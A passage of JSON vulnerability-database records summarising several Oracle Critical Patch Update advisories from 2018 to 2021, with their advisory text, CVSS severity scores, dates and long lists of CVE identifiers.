"CVE-2020-2685", "CVE-2020-2686", "CVE-2020-2687", "CVE-2020-2688", "CVE-2020-2689", "CVE-2020-2690", "CVE-2020-2691", "CVE-2020-2692", "CVE-2020-2693", "CVE-2020-2694", "CVE-2020-2695", "CVE-2020-2696", "CVE-2020-2697", "CVE-2020-2698", "CVE-2020-2699", "CVE-2020-2700", "CVE-2020-2701", "CVE-2020-2702", "CVE-2020-2703", "CVE-2020-2704", "CVE-2020-2705", "CVE-2020-2707", "CVE-2020-2709", "CVE-2020-2710", "CVE-2020-2711", "CVE-2020-2712", "CVE-2020-2713", "CVE-2020-2714", "CVE-2020-2715", "CVE-2020-2716", "CVE-2020-2717", "CVE-2020-2718", "CVE-2020-2719", "CVE-2020-2720", "CVE-2020-2721", "CVE-2020-2722", "CVE-2020-2723", "CVE-2020-2724", "CVE-2020-2725", "CVE-2020-2726", "CVE-2020-2727", "CVE-2020-2728", "CVE-2020-2729", "CVE-2020-2730", "CVE-2020-2731", "CVE-2020-6950"], "modified": "2020-04-20T00:00:00", "id": "ORACLE:CPUJAN2020", "href": "https://www.oracle.com/security-alerts/cpujan2020.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-24T19:59:04", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Please refer to:\n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/security-alerts>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 219 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2019 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/epmos/faces/DocumentDisplay?id=2566015.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-01-22T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - October 2019", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5180", "CVE-2015-9251", "CVE-2016-0729", "CVE-2016-1000031", "CVE-2016-4000", "CVE-2016-5425", "CVE-2016-6814", "CVE-2016-7103", "CVE-2016-8610", "CVE-2017-12626", "CVE-2017-16531", "CVE-2017-17558", "CVE-2017-5645", "CVE-2017-6056", "CVE-2017-7656", "CVE-2017-7657", "CVE-2017-7658", "CVE-2017-9735", "CVE-2018-0732", "CVE-2018-1000007", "CVE-2018-1000120", "CVE-2018-1000873", "CVE-2018-11784", "CVE-2018-11798", "CVE-2018-12384", "CVE-2018-12404", "CVE-2018-12536", "CVE-2018-12538", "CVE-2018-12545", "CVE-2018-1320", "CVE-2018-14718", "CVE-2018-14719", "CVE-2018-14720", "CVE-2018-14721", "CVE-2018-15756", "CVE-2018-16842", "CVE-2018-18065", "CVE-2018-18066", "CVE-2018-19360", "CVE-2018-19361", "CVE-2018-19362", "CVE-2018-20685", "CVE-2018-2875", "CVE-2018-3300", "CVE-2018-7185", "CVE-2018-8032", "CVE-2018-8034", "CVE-2018-8037", "CVE-2019-0188", "CVE-2019-0196", "CVE-2019-0197", "CVE-2019-0211", "CVE-2019-0215", "CVE-2019-0217", "CVE-2019-0220", "CVE-2019-0227", "CVE-2019-0232", "CVE-2019-10072", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-10241", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-11068", "CVE-2019-11358", "CVE-2019-12086", "CVE-2019-12384", "CVE-2019-12814", "CVE-2019-14379", "CVE-2019-14439", "CVE-2019-14540", "CVE-2019-1543", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1552", "CVE-2019-1559", "CVE-2019-1563", "CVE-2019-16335", "CVE-2019-17091", "CVE-2019-2734", "CVE-2019-2765", "CVE-2019-2872", "CVE-2019-2883", "CVE-2019-2884", "CVE-2019-2886", "CVE-2019-2887", "CVE-2019-2888", "CVE-2019-2889", "CVE-2019-2890", "CVE-2019-2891", "CVE-2019-2894", "CVE-2019-2895", "CVE-2019-2896", "CVE-2019-2897", "CVE-2019-2898", "CVE-2019-2899", "CVE-2019-2900", "CVE-2019-2901", "CVE-2019-2902", "CVE-2019-2903", "CVE-2019-2904", "CVE-2019-2905", "CVE-2019-2906", "CVE-2019-2907", "CVE-2019-2909", "CVE-2019-2910", "CVE-2019-2911", "CVE-2019-2913", "CVE-2019-2914", "CVE-2019-2915", "CVE-2019-2920", "CVE-2019-2922", "CVE-2019-2923", "CVE-2019-2924", "CVE-2019-2925", "CVE-2019-2926", "CVE-2019-2927", "CVE-2019-2929", "CVE-2019-2930", "CVE-2019-2931", "CVE-2019-2932", "CVE-2019-2933", "CVE-2019-2934", "CVE-2019-2935", "CVE-2019-2936", "CVE-2019-2937", "CVE-2019-2938", "CVE-2019-2939", "CVE-2019-2940", "CVE-2019-2941", "CVE-2019-2942", "CVE-2019-2943", "CVE-2019-2944", "CVE-2019-2945", "CVE-2019-2946", "CVE-2019-2947", "CVE-2019-2948", "CVE-2019-2949", "CVE-2019-2950", "CVE-2019-2951", "CVE-2019-2952", "CVE-2019-2953", "CVE-2019-2954", "CVE-2019-2955", "CVE-2019-2956", "CVE-2019-2957", "CVE-2019-2958", "CVE-2019-2959", "CVE-2019-2960", "CVE-2019-2961", "CVE-2019-2962", "CVE-2019-2963", "CVE-2019-2964", "CVE-2019-2965", "CVE-2019-2966", "CVE-2019-2967", "CVE-2019-2968", "CVE-2019-2969", "CVE-2019-2970", "CVE-2019-2971", "CVE-2019-2972", "CVE-2019-2973", "CVE-2019-2974", "CVE-2019-2975", "CVE-2019-2976", "CVE-2019-2977", "CVE-2019-2978", "CVE-2019-2979", "CVE-2019-2980", "CVE-2019-2981", "CVE-2019-2982", "CVE-2019-2983", "CVE-2019-2984", "CVE-2019-2985", "CVE-2019-2986", "CVE-2019-2987", "CVE-2019-2988", "CVE-2019-2989", "CVE-2019-2990", "CVE-2019-2991", "CVE-2019-2992", "CVE-2019-2993", "CVE-2019-2994", "CVE-2019-2995", "CVE-2019-2996", "CVE-2019-2997", "CVE-2019-2998", "CVE-2019-2999", "CVE-2019-3000", "CVE-2019-3001", "CVE-2019-3002", "CVE-2019-3003", "CVE-2019-3004", "CVE-2019-3005", "CVE-2019-3008", "CVE-2019-3009", "CVE-2019-3010", "CVE-2019-3011", "CVE-2019-3012", "CVE-2019-3014", "CVE-2019-3015", "CVE-2019-3017", "CVE-2019-3018", "CVE-2019-3019", "CVE-2019-3020", "CVE-2019-3021", "CVE-2019-3022", "CVE-2019-3023", "CVE-2019-3024", "CVE-2019-3025", "CVE-2019-3026", "CVE-2019-3027", "CVE-2019-3028", "CVE-2019-3031", "CVE-2019-3855", "CVE-2019-3856", "CVE-2019-3857", "CVE-2019-3858", "CVE-2019-3859", "CVE-2019-3860", "CVE-2019-3861", "CVE-2019-3862", "CVE-2019-3863", "CVE-2019-5435", "CVE-2019-5436", "CVE-2019-5443", "CVE-2019-6109", "CVE-2019-6111", "CVE-2019-8457", "CVE-2019-9511", "CVE-2019-9517", "CVE-2019-9936", "CVE-2019-9937"], "modified": "2019-10-15T00:00:00", "id": "ORACLE:CPUOCT2019", "href": "https://www.oracle.com/security-alerts/cpuoct2019.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-24T19:59:11", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 329 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ January 2021 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2739494.1>).\n\n**Please note that since the release of the October 2020 Critical Patch Update, Oracle has released a Security Alert for Oracle WebLogic Server: [CVE-2020-14750 (November 1, 2020)](<https://www.oracle.com/security-alerts/alert-cve-2020-14750.html>). Customers are strongly advised to apply this Critical Patch Update, which includes patches for this Alert as well as additional patches.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - January 2021", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2098", "CVE-2015-4000", "CVE-2015-8965", "CVE-2016-1000031", "CVE-2016-5725", "CVE-2017-12626", "CVE-2017-5611", "CVE-2017-5645", "CVE-2017-8028", "CVE-2018-0732", "CVE-2018-10237", "CVE-2018-11775", "CVE-2018-1258", "CVE-2018-1285", "CVE-2018-15756", "CVE-2018-20781", "CVE-2018-2587", "CVE-2018-7318", "CVE-2018-8032", "CVE-2018-9019", "CVE-2019-0188", "CVE-2019-0227", "CVE-2019-0230", "CVE-2019-0233", "CVE-2019-10086", "CVE-2019-10173", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-10744", "CVE-2019-11135", "CVE-2019-11269", "CVE-2019-11358", "CVE-2019-12399", "CVE-2019-12402", "CVE-2019-12415", "CVE-2019-13990", "CVE-2019-14862", "CVE-2019-1551", "CVE-2019-1559", "CVE-2019-17091", "CVE-2019-17195", "CVE-2019-17359", "CVE-2019-17563", "CVE-2019-17566", "CVE-2019-17569", "CVE-2019-20892", "CVE-2019-20907", "CVE-2019-2697", "CVE-2019-3773", "CVE-2019-3778", "CVE-2019-5427", "CVE-2019-7164", "CVE-2019-7548", "CVE-2019-9511", "CVE-2019-9513", "CVE-2020-10531", "CVE-2020-10543", "CVE-2020-10650", "CVE-2020-10672", "CVE-2020-10673", "CVE-2020-10683", "CVE-2020-10722", "CVE-2020-10723", "CVE-2020-10724", "CVE-2020-10725", "CVE-2020-10726", "CVE-2020-10878", "CVE-2020-10968", "CVE-2020-10969", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11111", "CVE-2020-11112", "CVE-2020-11113", "CVE-2020-11612", "CVE-2020-11619", "CVE-2020-11620", "CVE-2020-11655", "CVE-2020-11656", "CVE-2020-11971", "CVE-2020-11972", "CVE-2020-11973", "CVE-2020-11979", "CVE-2020-11984", "CVE-2020-11985", "CVE-2020-11993", "CVE-2020-11994", "CVE-2020-11996", "CVE-2020-11998", "CVE-2020-12723", "CVE-2020-13254", "CVE-2020-13596", "CVE-2020-13871", "CVE-2020-13934", "CVE-2020-13935", "CVE-2020-13954", "CVE-2020-14060", "CVE-2020-14061", "CVE-2020-14062", "CVE-2020-14147", "CVE-2020-14195", "CVE-2020-14422", "CVE-2020-14750", "CVE-2020-14756", "CVE-2020-14803", "CVE-2020-15025", "CVE-2020-15358", "CVE-2020-17498", "CVE-2020-17521", "CVE-2020-17530", "CVE-2020-1935", "CVE-2020-1938", "CVE-2020-1945", "CVE-2020-1967", "CVE-2020-1968", "CVE-2020-1971", "CVE-2020-24583", "CVE-2020-24584", "CVE-2020-24616", "CVE-2020-24750", "CVE-2020-25020", "CVE-2020-2555", "CVE-2020-25862", "CVE-2020-25863", "CVE-2020-25866", "CVE-2020-26575", "CVE-2020-27216", "CVE-2020-35460", "CVE-2020-5398", "CVE-2020-5407", "CVE-2020-5408", "CVE-2020-5421", "CVE-2020-7064", "CVE-2020-8172", "CVE-2020-8174", "CVE-2020-8265", "CVE-2020-8277", "CVE-2020-8287", "CVE-2020-9281", "CVE-2020-9327", "CVE-2020-9484", "CVE-2020-9488", "CVE-2020-9490", "CVE-2020-9546", "CVE-2020-9547", "CVE-2020-9548", "CVE-2021-1993", "CVE-2021-1994", "CVE-2021-1995", "CVE-2021-1996", "CVE-2021-1997", "CVE-2021-1998", "CVE-2021-1999", "CVE-2021-2000", "CVE-2021-2001", "CVE-2021-2002", "CVE-2021-2003", "CVE-2021-2004", "CVE-2021-2005", "CVE-2021-2006", "CVE-2021-2007", "CVE-2021-2009", "CVE-2021-2010", "CVE-2021-2011", "CVE-2021-2012", "CVE-2021-2013", "CVE-2021-2014", "CVE-2021-2015", "CVE-2021-2016", "CVE-2021-2017", "CVE-2021-2018", "CVE-2021-2019", "CVE-2021-2020", "CVE-2021-2021", "CVE-2021-2022", "CVE-2021-2023", "CVE-2021-2024", "CVE-2021-2025", "CVE-2021-2026", "CVE-2021-2027", "CVE-2021-2028", "CVE-2021-2029", "CVE-2021-2030", "CVE-2021-2031", "CVE-2021-2032", "CVE-2021-2033", "CVE-2021-2034", "CVE-2021-2035", "CVE-2021-2036", "CVE-2021-2038", "CVE-2021-2039", "CVE-2021-2040", "CVE-2021-2041", "CVE-2021-2042", "CVE-2021-2043", "CVE-2021-2044", "CVE-2021-2045", "CVE-2021-2046", "CVE-2021-2047", "CVE-2021-2048", "CVE-2021-2049", "CVE-2021-2050", "CVE-2021-2051", "CVE-2021-2052", "CVE-2021-2054", "CVE-2021-2055", "CVE-2021-2056", "CVE-2021-2057", "CVE-2021-2058", "CVE-2021-2059", "CVE-2021-2060", "CVE-2021-2061", "CVE-2021-2062", "CVE-2021-2063", "CVE-2021-2064", "CVE-2021-2065", "CVE-2021-2066", "CVE-2021-2067", "CVE-2021-2068", "CVE-2021-2069", "CVE-2021-2070", "CVE-2021-2071", "CVE-2021-2072", "CVE-2021-2073", "CVE-2021-2074", "CVE-2021-2075", "CVE-2021-2076", "CVE-2021-2077", "CVE-2021-2078", "CVE-2021-2079", "CVE-2021-2080", "CVE-2021-2081", "CVE-2021-2082", "CVE-2021-2083", "CVE-2021-2084", "CVE-2021-2085", "CVE-2021-2086", "CVE-2021-2087", "CVE-2021-2088", "CVE-2021-2089", "CVE-2021-2090", "CVE-2021-2091", "CVE-2021-2092", "CVE-2021-2093", "CVE-2021-2094", "CVE-2021-2096", "CVE-2021-2097", "CVE-2021-2098", "CVE-2021-2099", "CVE-2021-2100", "CVE-2021-2101", "CVE-2021-2102", "CVE-2021-2103", "CVE-2021-2104", "CVE-2021-2105", "CVE-2021-2106", "CVE-2021-2107", "CVE-2021-2108", "CVE-2021-2109", "CVE-2021-2110", "CVE-2021-2111", "CVE-2021-2112", "CVE-2021-2113", "CVE-2021-2114", "CVE-2021-2115", "CVE-2021-2116", "CVE-2021-2117", "CVE-2021-2118", "CVE-2021-2119", "CVE-2021-2120", "CVE-2021-2121", "CVE-2021-2122", "CVE-2021-2123", "CVE-2021-2124", "CVE-2021-2125", "CVE-2021-2126", "CVE-2021-2127", "CVE-2021-2128", "CVE-2021-2129", "CVE-2021-2130", "CVE-2021-2131"], "modified": "2021-02-22T00:00:00", "id": "ORACLE:CPUJAN2021", "href": "https://www.oracle.com/security-alerts/cpujan2021.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T15:44:23", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to: \n\n * Critical Patch Updates, Security Alerts and Bulletins for information about Oracle Security Advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 334 new security fixes across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ July 2018 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/epmos/faces/DocumentDisplay?id=2420273.1>).\n\nMany industry experts anticipate that exploits leveraging known flaws in modern processor designs will continue to be disclosed for the foreseeable future (i.e., \u201cSpectre\u201d variants). For information related to these issues, please refer to:\n\n * the January 2018 Critical Patch Update (and later) Advisories,\n * the \"Addendum to the January 2018 Critical Patch Update Advisory for Spectre (CVE-2017-5715, CVE-2017-5753) and Meltdown (CVE-2017-5754)\" ([Doc ID 2347948.1](<https://support.oracle.com/epmos/faces/DocumentDisplay?id=2347948.1>)), and\n * \"Information about processor vulnerabilities CVE-2018-3640 (\"Spectre v3a\") and CVE-2018-3639 (\"Spectre v4\")\" ([Doc ID 2399123.1](<https://support.oracle.com/epmos/faces/DocumentDisplay?id=2399123.1>)).\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-17T00:00:00", "title": "CPU July 2018", "type": "oracle", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5600", "CVE-2018-3010", "CVE-2017-5533", "CVE-2018-3004", "CVE-2015-5351", "CVE-2018-3091", "CVE-2018-3021", "CVE-2017-13218", "CVE-2017-9798", "CVE-2018-3109", "CVE-2018-2935", "CVE-2018-1000120", "CVE-2018-2948", "CVE-2018-3019", "CVE-2011-4461", "CVE-2018-2984", "CVE-2016-7103", "CVE-2017-5753", "CVE-2018-2893", "CVE-2018-2917", "CVE-2018-2981", "CVE-2017-10989", "CVE-2017-5754", "CVE-2018-3098", "CVE-2018-2965", "CVE-2018-3029", "CVE-2018-3072", "CVE-2018-1304", "CVE-2018-2969", "CVE-2018-2955", "CVE-2018-3104", "CVE-2018-3079", "CVE-2018-2906", "CVE-2018-3048", "CVE-2015-6420", "CVE-2018-2988", "CVE-2018-2944", "CVE-2018-3093", "CVE-2018-2881", "CVE-2015-3415", "CVE-2018-3055", "CVE-2017-6074", "CVE-2018-3050", "CVE-2016-5019", "CVE-2018-3027", "CVE-2018-3025", "CVE-2018-2951", "CVE-2018-3046", "CVE-2018-1275", "CVE-2018-2990", "CVE-2018-7489", "CVE-2018-2980", "CVE-2018-3069", "CVE-2018-2894", "CVE-2018-2954", "CVE-2018-3053", "CVE-2018-2953", "CVE-2018-2938", "CVE-2016-4055", "CVE-2018-3008", "CVE-2016-9878", "CVE-2017-3735", "CVE-2018-2973", "CVE-2015-5262", "CVE-2018-3009", "CVE-2014-0230", "CVE-2018-2947", "CVE-2018-1271", "CVE-2018-3015", "CVE-2018-3096", "CVE-2018-2989", "CVE-2018-2897", "CVE-2018-2961", "CVE-2018-2920", "CVE-2018-3006", "CVE-2018-1000121", "CVE-2016-0714", "CVE-2018-2994", "CVE-2016-3092", "CVE-2018-3043", "CVE-2018-2937", "CVE-2018-2924", "CVE-2018-2966", "CVE-2017-3652", "CVE-2016-5300", "CVE-2018-3031", "CVE-2018-2908", "CVE-2018-1171", "CVE-2018-3100", "CVE-2017-3648", "CVE-2014-9746", "CVE-2018-2992", "CVE-2015-5345", "CVE-2018-3002", "CVE-2018-2942", "CVE-2018-3061", "CVE-2018-3075", "CVE-2016-2105", "CVE-2018-2998", "CVE-2014-3577", "CVE-2018-2956", "CVE-2018-2975", "CVE-2016-2107", "CVE-2016-4463", "CVE-2018-3044", "CVE-2015-7501", "CVE-2018-2976", "CVE-2018-2999", "CVE-2017-3649", "CVE-2018-3101", "CVE-2018-3067", "CVE-2017-0785", "CVE-2017-3737", "CVE-2018-2962", "CVE-2018-2926", "CVE-2017-15707", "CVE-2018-2958", "CVE-2016-1182", "CVE-2018-1258", "CVE-2018-3073", "CVE-2018-1000122", "CVE-2018-1305", "CVE-2018-3095", "CVE-2017-13088", "CVE-2018-2977", "CVE-2017-5662", "CVE-2018-2995", "CVE-2017-9526", "CVE-2018-3086", "CVE-2018-2964", "CVE-2018-3047", "CVE-2018-2985", "CVE-2018-3032", "CVE-2018-2960", "CVE-2018-2997", "CVE-2018-2972", "CVE-2018-3034", "CVE-2018-3023", "CVE-2018-2904", "CVE-2016-0718", "CVE-2018-2882", "CVE-2018-3065", "CVE-2018-3102", "CVE-2014-2532", "CVE-2018-2957", "CVE-2017-5715", "CVE-2018-3057", "CVE-2016-2109", "CVE-2017-3633", "CVE-2018-2921", "CVE-2018-2915", "CVE-2018-1000300", "CVE-2017-3647", "CVE-2018-2959", "CVE-2018-2767", "CVE-2014-0114", "CVE-2018-3080", "CVE-2018-2934", "CVE-2017-3732", "CVE-2018-2949", "CVE-2018-3089", "CVE-2018-2945", "CVE-2018-2943", "CVE-2018-0739", "CVE-2015-5346", "CVE-2018-2896", "CVE-2018-3013", "CVE-2018-2936", "CVE-2018-2986", "CVE-2018-2905", "CVE-2018-2916", "CVE-2018-3087", "CVE-2018-3007", "CVE-2015-3416", "CVE-2018-1313", "CVE-2018-2991", "CVE-2018-2598", "CVE-2018-3033", "CVE-2018-8013", "CVE-2015-5174", "CVE-2014-9029", "CVE-2018-3012", "CVE-2018-3036", "CVE-2018-3062", "CVE-2018-3108", "CVE-2018-1272", "CVE-2018-2987", "CVE-2017-7525", "CVE-2018-3060", "CVE-2018-3071", "CVE-2018-3014", "CVE-2018-3051", "CVE-2015-3414", "CVE-2018-3103", "CVE-2018-2979", "CVE-2018-2993", "CVE-2018-3092", "CVE-2015-0204", "CVE-2014-7810", "CVE-2018-3022", "CVE-2018-1270", "CVE-2018-2903", "CVE-2017-3651", "CVE-2018-3058", "CVE-2016-0706", "CVE-2017-3641", "CVE-2018-2928", "CVE-2017-5664", "CVE-2018-2900", "CVE-2018-2898", "CVE-2018-3003", "CVE-2018-3001", "CVE-2018-2950", "CVE-2018-2929", "CVE-2018-0733", "CVE-2017-3635", "CVE-2018-3094", "CVE-2016-1181", "CVE-2018-2941", "CVE-2014-8157", "CVE-2018-2933", "CVE-2018-3017", "CVE-2016-9843", "CVE-2018-2946", "CVE-2016-2176", "CVE-2016-8735", "CVE-2018-2940", "CVE-2017-3738", "CVE-2018-2930", "CVE-2018-3049", "CVE-2018-2918", "CVE-2018-3076", "CVE-2018-2982", "CVE-2018-3041", "CVE-2016-5195", "CVE-2018-3026", "CVE-2018-2901", "CVE-2018-2939", "CVE-2018-3081", "CVE-2018-3085", "CVE-2017-5645", "CVE-2016-2099", "CVE-2018-3024", "CVE-2018-2892", "CVE-2018-3070", "CVE-2018-3018", "CVE-2017-12617", "CVE-2018-3077", "CVE-2018-3054", "CVE-2017-5529", "CVE-2017-3653", "CVE-2016-9841", "CVE-2015-7940", "CVE-2018-2970", "CVE-2018-2963", "CVE-2017-3736", "CVE-2018-3028", "CVE-2018-3074", "CVE-2018-3052", "CVE-2018-3063", "CVE-2017-0379", "CVE-2018-2919", "CVE-2018-3039", "CVE-2018-3082", "CVE-2018-2899", "CVE-2018-2974", "CVE-2018-2932", "CVE-2018-3038", "CVE-2018-3097", "CVE-2018-3020", "CVE-2016-3506", "CVE-2018-3005", "CVE-2018-3090", "CVE-2017-3636", "CVE-2018-3035", "CVE-2018-2968", "CVE-2018-2907", "CVE-2017-15095", "CVE-2018-3064", "CVE-2018-3037", "CVE-2018-2895", "CVE-2018-3068", "CVE-2018-3078", "CVE-2018-2996", "CVE-2018-2923", "CVE-2018-3030", "CVE-2018-3099", "CVE-2018-3084", "CVE-2016-2106", "CVE-2017-3634", "CVE-2016-6814", "CVE-2018-3066", "CVE-2018-2925", "CVE-2018-3056", "CVE-2018-3639", "CVE-2018-1000301", "CVE-2018-3040", "CVE-2018-3000", "CVE-2018-3045", "CVE-2018-3640", "CVE-2018-3016", "CVE-2018-3088", "CVE-2018-2967", "CVE-2018-2888", "CVE-2018-1327", "CVE-2018-2927", "CVE-2018-2952", "CVE-2018-3105", "CVE-2018-3042", "CVE-2018-2891", "CVE-2018-2978"], "modified": "2018-10-12T00:00:00", "id": "ORACLE:CPUJUL2018", "href": "https://www.oracle.com/security-alerts/cpujul2018.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-24T19:58:58", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Please refer to:\n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/security-alerts>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 399 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2020 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2652714.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2020", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0254", "CVE-2015-1832", "CVE-2015-3253", "CVE-2015-7940", "CVE-2015-9251", "CVE-2016-0701", "CVE-2016-1000031", "CVE-2016-10244", "CVE-2016-10251", "CVE-2016-10328", "CVE-2016-2183", "CVE-2016-2381", "CVE-2016-3092", "CVE-2016-4000", "CVE-2016-4463", "CVE-2016-6306", "CVE-2016-6489", "CVE-2016-7103", "CVE-2016-8610", 